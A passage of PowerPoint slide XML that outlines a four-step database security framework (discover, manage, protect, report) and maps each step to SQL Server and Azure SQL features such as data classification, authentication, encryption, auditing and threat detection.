            <a:off x="798379" y="1785789"/>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1</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4" name="Rectangle 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2866281" y="2848135"/>
            <a:ext cx="5395772" cy="1178397"/>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Manage authentication and authorization mechanisms</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Properly configure database firewall</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Limit application access according to authorization principles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045091" y="2848135"/>
            <a:ext cx="1884251" cy="1178397"/>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defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr defTabSz="914367">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="2000" b="1" cap="none" spc="-100" baseline="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst/>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Manage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Oval 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="798379" y="3162515"/>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2</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8" name="Rectangle 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2886518" y="4195342"/>
            <a:ext cx="5375535" cy="1178397"/>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224074"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Encrypt data at rest, in motion, in use</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Maintain records and audits of all database activities</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Detect data breaches and respond accordingly</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Ensure business continuity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045091" y="4195342"/>
            <a:ext cx="1884251" cy="1178397"/>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defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr defTabSz="914367">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="2000" b="1" cap="none" spc="-100" baseline="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst/>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Protect</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Oval 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="798379" y="4509722"/>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3</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2" name="Rectangle 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2886518" y="5574079"/>
            <a:ext cx="5375535" cy="1180920"/>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371" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Maintain audit records of database activities</a:t>
            </a:r>
          </a:p>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371" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Continuously assess and analyze security measures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045091" y="5574282"/>
            <a:ext cx="1884251" cy="1178397"/>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defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr defTabSz="914367">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="2000" b="1" cap="none" spc="-100" baseline="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst/>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Report</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Oval 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="798379" y="5889543"/>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4</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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Straight Arrow Connector 3"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1874967" y="2337793"/>
            <a:ext cx="0" cy="635568"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx2">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1874967" y="3781149"/>
            <a:ext cx="0" cy="635568"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx2">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1890447" y="5162585"/>
            <a:ext cx="0" cy="635568"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="50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9D0E828-D71F-4DA4-BD18-163AC1B0D30C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9183583" y="964182"/>
            <a:ext cx="1619430" cy="566576"/>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Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Technology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFA20704-BBC2-42A7-8F95-F3D74908C3BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8316846" y="1471410"/>
            <a:ext cx="3828039" cy="1178397"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>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T-SQL queries, full-text search</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Data classification</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Vulnerability Assessment </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9F69860-A0CB-4846-8E78-E721FC811D20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8316844" y="2848135"/>
            <a:ext cx="3875156" cy="1178397"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>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400"/>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Windows authentication, Azure AD authentication, role-based security, and so on</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Azure SQL Database Firewall</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Dynamic data masking, Row-Level Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{288A59C3-8E49-4CA7-93B5-451B766C46BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8316846" y="4195342"/>
            <a:ext cx="3828039" cy="1178397"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>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224074"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TLS, TDE, Always Encrypted</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Auditing</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Threat Detection</a:t>
            </a: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37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Always On, active geo-replication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18C31652-D707-4AF3-811F-3F535FB82777}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8316846" y="5574079"/>
            <a:ext cx="3828039" cy="1180920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>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14049" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1371" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>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371" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Auditing, Temporal Tables</a:t>
            </a:r>
          </a:p>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371" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Vulnerability Assessment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914049" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1371" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BF5732A-3C26-40FB-AB35-9D73580DBE14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4601297" y="964182"/>
            <a:ext cx="1190463" cy="566576"/>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Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="43" name="Group 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D47903A5-3D45-4129-8D1C-3EF031B89FBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="20593720">
            <a:off x="9919789" y="1798736"/>
            <a:ext cx="647838" cy="522992"/>
            <a:chOff x="10738915" y="525462"/>
            <a:chExt cx="660922" cy="533555"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Explosion: 8 Points 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04C00694-7C09-450E-ABD4-0CFB2AB39763}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10738915" y="525462"/>
              <a:ext cx="660922" cy="533555"/>
            </a:xfrm>
            <a:prstGeom prst="irregularSeal1">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5" name="Rectangle 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1CC4B51-1AB7-416D-AA77-624CCFE6636E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10774710" y="632356"/>
              <a:ext cx="564453" cy="291841"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:sp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light"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>new!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="46" name="Group 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B725FCB-4731-46F4-B259-54DC7C1A0A5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="20593720">
            <a:off x="10452803" y="6062179"/>
            <a:ext cx="647838" cy="522992"/>
            <a:chOff x="10738915" y="525462"/>
            <a:chExt cx="660922" cy="533555"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="Explosion: 8 Points 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A5F720B-11B2-4FA4-832E-D4463B30B688}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10738915" y="525462"/>
              <a:ext cx="660922" cy="533555"/>
            </a:xfrm>
            <a:prstGeom prst="irregularSeal1">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8" name="Rectangle 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8B31096-A834-4147-A81F-011885E77696}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10774710" y="632356"/>
              <a:ext cx="564453" cy="291841"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:sp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light"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>new!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="49" name="Group 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E437C4CE-3174-48C7-8641-CA95AFE188A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="20593720">
            <a:off x="10499724" y="2086125"/>
            <a:ext cx="647838" cy="522992"/>
            <a:chOff x="10738915" y="525462"/>
            <a:chExt cx="660922" cy="533555"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="Explosion: 8 Points 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8851545B-C019-43D0-8225-11111FDB64B4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10738915" y="525462"/>
              <a:ext cx="660922" cy="533555"/>
            </a:xfrm>
            <a:prstGeom prst="irregularSeal1">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5" name="Rectangle 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A37BF0A-E2C1-4668-B77C-87F0AE5270A1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10774710" y="632356"/>
              <a:ext cx="564453" cy="291841"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:sp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light"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>new!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="362128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400" spc="-50">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Translated to SQL technologies...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="542362" y="1676602"/>
            <a:ext cx="2043139" cy="2161415"/>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745"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Discover</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0">
              <a:ln w="3175">
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="CDF4FF">
                  <a:lumMod val="50000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI Light"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Oval 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="295649" y="2452728"/>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1</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 name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFA20704-BBC2-42A7-8F95-F3D74908C3BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7814117" y="1676400"/>
            <a:ext cx="3828039" cy="2166053"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>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T-SQL Queries, Full Text search</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Data classification</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Vulnerability Assessment </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="43" name="Group 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D47903A5-3D45-4129-8D1C-3EF031B89FBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="20593720">
            <a:off x="10019162" y="2444533"/>
            <a:ext cx="647838" cy="522992"/>
            <a:chOff x="10738915" y="525462"/>
            <a:chExt cx="660922" cy="533555"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Explosion: 8 Points 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04C00694-7C09-450E-ABD4-0CFB2AB39763}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10738915" y="525462"/>
              <a:ext cx="660922" cy="533555"/>
            </a:xfrm>
            <a:prstGeom prst="irregularSeal1">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45" name="Rectangle 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1CC4B51-1AB7-416D-AA77-624CCFE6636E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10774710" y="632356"/>
              <a:ext cx="564453" cy="291841"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:sp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light"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>new!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="49" name="Group 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E437C4CE-3174-48C7-8641-CA95AFE188A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="20593720">
            <a:off x="10861497" y="3010532"/>
            <a:ext cx="647838" cy="522992"/>
            <a:chOff x="10738915" y="525462"/>
            <a:chExt cx="660922" cy="533555"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="Explosion: 8 Points 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8851545B-C019-43D0-8225-11111FDB64B4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10738915" y="525462"/>
              <a:ext cx="660922" cy="533555"/>
            </a:xfrm>
            <a:prstGeom prst="irregularSeal1">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5" name="Rectangle 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A37BF0A-E2C1-4668-B77C-87F0AE5270A1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10774710" y="632356"/>
              <a:ext cx="564453" cy="291841"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:sp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light"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>new!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Rectangle 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2496443" y="1676400"/>
